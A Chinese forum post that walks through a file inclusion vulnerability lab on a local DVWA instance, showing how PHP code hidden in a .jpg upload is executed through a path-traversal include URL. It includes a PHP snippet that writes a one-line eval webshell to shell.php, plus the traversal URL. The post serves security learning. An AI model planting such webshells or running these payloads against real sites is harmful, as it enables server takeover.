请选择 进入手机版 | 继续访问电脑版
查看: 865|回复: 0

文件包含

[复制链接]
  • TA的每日心情
    开心
    2019-11-6 17:43
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2019-10-17 20:41:03 | 显示全部楼层 |阅读模式
    本帖最后由 bailancheng 于 2019-10-17 20:41 编辑

    文件包含漏洞

    PHP解析漏洞:
    01.txt是一个正常的文本文件,但文件内容却是符合PHP语法的代码:
    在记事本中写入下面这段代码,保存成jpg文件。
    <?php
    phpinfo();
    ?>

    利用文件包含漏洞包含01.txt,其中的代码被正确执行了。
    将01.txt的扩展名改为jpg、rar、doc、xxx等,都可以执行。
    只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析
    接下来开始输入一句话木马:
    <?php
    fwrite(fopen("shell.php","w"),’<?php eval($_POST[123]); ?>’);
    ?>

    开始上传:
    首先将级别改为最高,然后开始上传

    点击上传后:

    在\AppServ\www\dvwa\vulnerabilities\fi目录中生成shell.php文件,文件内容正是一句话木马。
    接下来修改漏洞级别为low使用文件上传,通过文件包含漏洞执行jpg文件中的代码
    http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/ma.jpg

    测试shell.php:

    什么都不显示表示有这个目录,已经生成了

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表